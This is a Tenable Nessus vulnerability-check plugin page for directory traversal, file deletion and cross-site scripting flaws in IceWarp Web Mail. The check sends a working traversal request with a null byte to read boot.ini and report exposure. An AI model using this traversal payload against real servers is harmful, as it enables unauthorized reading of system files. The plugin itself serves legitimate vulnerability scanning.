Lucene search
This script is Copyright (C) 2005-2022 Tenable Network Security, Inc.ICEWARP_WEBMAIL_VULNS4.NASLHistorySep 30, 2005 - 12:00 a.m.
IceWarp Web Mail Multiple Flaws (4)
2005-09-3000:00:00
This script is Copyright (C) 2005-2022 Tenable Network Security, Inc.
www.tenable.com
14
The remote host is running IceWarp Web Mail - a webmail solution available for the Microsoft Windows platform.
The remote version of this software is affected by a directory traversal vulnerability that may allow an attacker to retrieve arbitrary files on the system.
Another input validation flaw allows an attacker to delete arbitrary files on the remote host.
Note this flaw indicates IceWarp is vulnerable to cross-site scripting attacks too.
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
include('deprecated_nasl_level.inc');
include('compat.inc');
if (description)
{
script_id(19784);
script_version("1.21");
script_set_attribute(attribute:"plugin_modification_date", value:"2022/04/11");
script_cve_id("CVE-2005-3131", "CVE-2005-3132", "CVE-2005-3133");
script_bugtraq_id(14980, 14986, 14988);
script_name(english:"IceWarp Web Mail Multiple Flaws (4)");
script_set_attribute(attribute:"synopsis", value:
"It is possible to retrieve/delete local files on the remote system
through the webmail service.");
script_set_attribute(attribute:"description", value:
"The remote host is running IceWarp Web Mail - a webmail solution
available for the Microsoft Windows platform.
The remote version of this software is affected by a directory
traversal vulnerability that may allow an attacker to retrieve
arbitrary files on the system.
Another input validation flaw allows an attacker to delete arbitrary
files on the remote host.
Note this flaw indicates IceWarp is vulnerable to cross-site scripting
attacks too.");
script_set_attribute(attribute:"see_also", value:"https://marc.info/?l=bugtraq&m=112810385104168&w=2");
script_set_attribute(attribute:"solution", value:
"Unknown at this time.");
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:P/A:C");
script_set_cvss_temporal_vector("CVSS2#E:H/RL:U/RC:ND");
script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
script_set_attribute(attribute:"exploit_available", value:"true");
script_set_attribute(attribute:"exploited_by_nessus", value:"true");
script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);
script_set_attribute(attribute:"vuln_publication_date", value:"2005/09/30");
script_set_attribute(attribute:"plugin_publication_date", value:"2005/09/30");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"cpe", value:"cpe:/a:icewarp:webmail");
script_set_attribute(attribute:"thorough_tests", value:"true");
script_end_attributes();
script_category(ACT_GATHER_INFO);
script_family(english:"CGI abuses");
script_copyright(english:"This script is Copyright (C) 2005-2022 Tenable Network Security, Inc.");
script_dependencies("icewarp_webmail_vulns.nasl");
script_require_ports("Services/www", 32000);
exit(0);
}
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
port = get_http_port(default:32000);
version = get_kb_item("www/" + port + "/icewarp_webmail/version");
if ( ! version ) exit(0);
u = "/accounts/help.html?helpid=../../../../../../../../../../../../boot.ini%00";
w = http_send_recv3(method:"GET", item:u, port:port);
if (isnull(w)) exit(0);
r = w[2];
r = strstr (r, "[boot loader]");
if (isnull(r)) exit (0);
report = string ("It was possible to retrieve the file boot.ini :\n\n", r);
security_hole (port:port, extra: report);
set_kb_item(name: 'www/'+port+'/XSS', value: TRUE);
Related
cve
cve
Related for ICEWARP_WEBMAIL_VULNS4.NASL